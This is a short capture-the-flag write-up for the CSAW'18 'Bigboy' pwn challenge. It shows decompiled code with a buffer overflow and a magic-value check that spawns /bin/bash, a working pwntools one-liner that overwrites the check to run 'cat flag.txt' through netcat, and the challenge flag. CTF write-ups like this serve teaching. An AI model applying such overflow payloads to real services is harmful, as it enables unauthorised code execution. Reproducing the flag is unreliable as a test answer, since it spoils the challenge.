CSAW'18 CTF Qualification - Pwn (25 pts).

CSAW’18 CTF Qualification: Bigboy

Event Challenge Category Points Solves
CSAW’18 CTF Qualification Bigboy Pwn 25 656


Only big boi pwners will get this one!

nc 9000

You can download the elf file here : boi


This challenge is a simple buffer overflow with a check that may lead to code execution. It’s an easy pwn, so one liner is the way to go !


Step 1 : Use ida to decompile the program and not lose time, then, overflow with the good value many time, to access the “/bin/bash”.

int __cdecl main(int argc, const char **argv, const char **envp)
  __int64 buf; // [rsp+10h] [rbp-30h]
  __int64 v5; // [rsp+18h] [rbp-28h]
  __int64 v6; // [rsp+20h] [rbp-20h]
  int v7; // [rsp+28h] [rbp-18h]
  unsigned __int64 v8; // [rsp+38h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  buf = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0;
  HIDWORD(v6) = -559038737;
  puts("Are you a big boiiiii??");
  read(0, &buf, 0x18uLL);
  if ( HIDWORD(v6) == 0xCAF3BAEE )
    run_cmd("/bin/bash", &buf);
    run_cmd("/bin/date", &buf);
  return 0;

Step 2 : Print the cmd you want to run.

python2 -c 'from pwn import *; print p32(0xCAF3BAEE) * 6; print "cat flag.txt"' | nc 9000

Step 3 : Enjoy your free 25 points yayyyy ! \o/

The flag is : flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}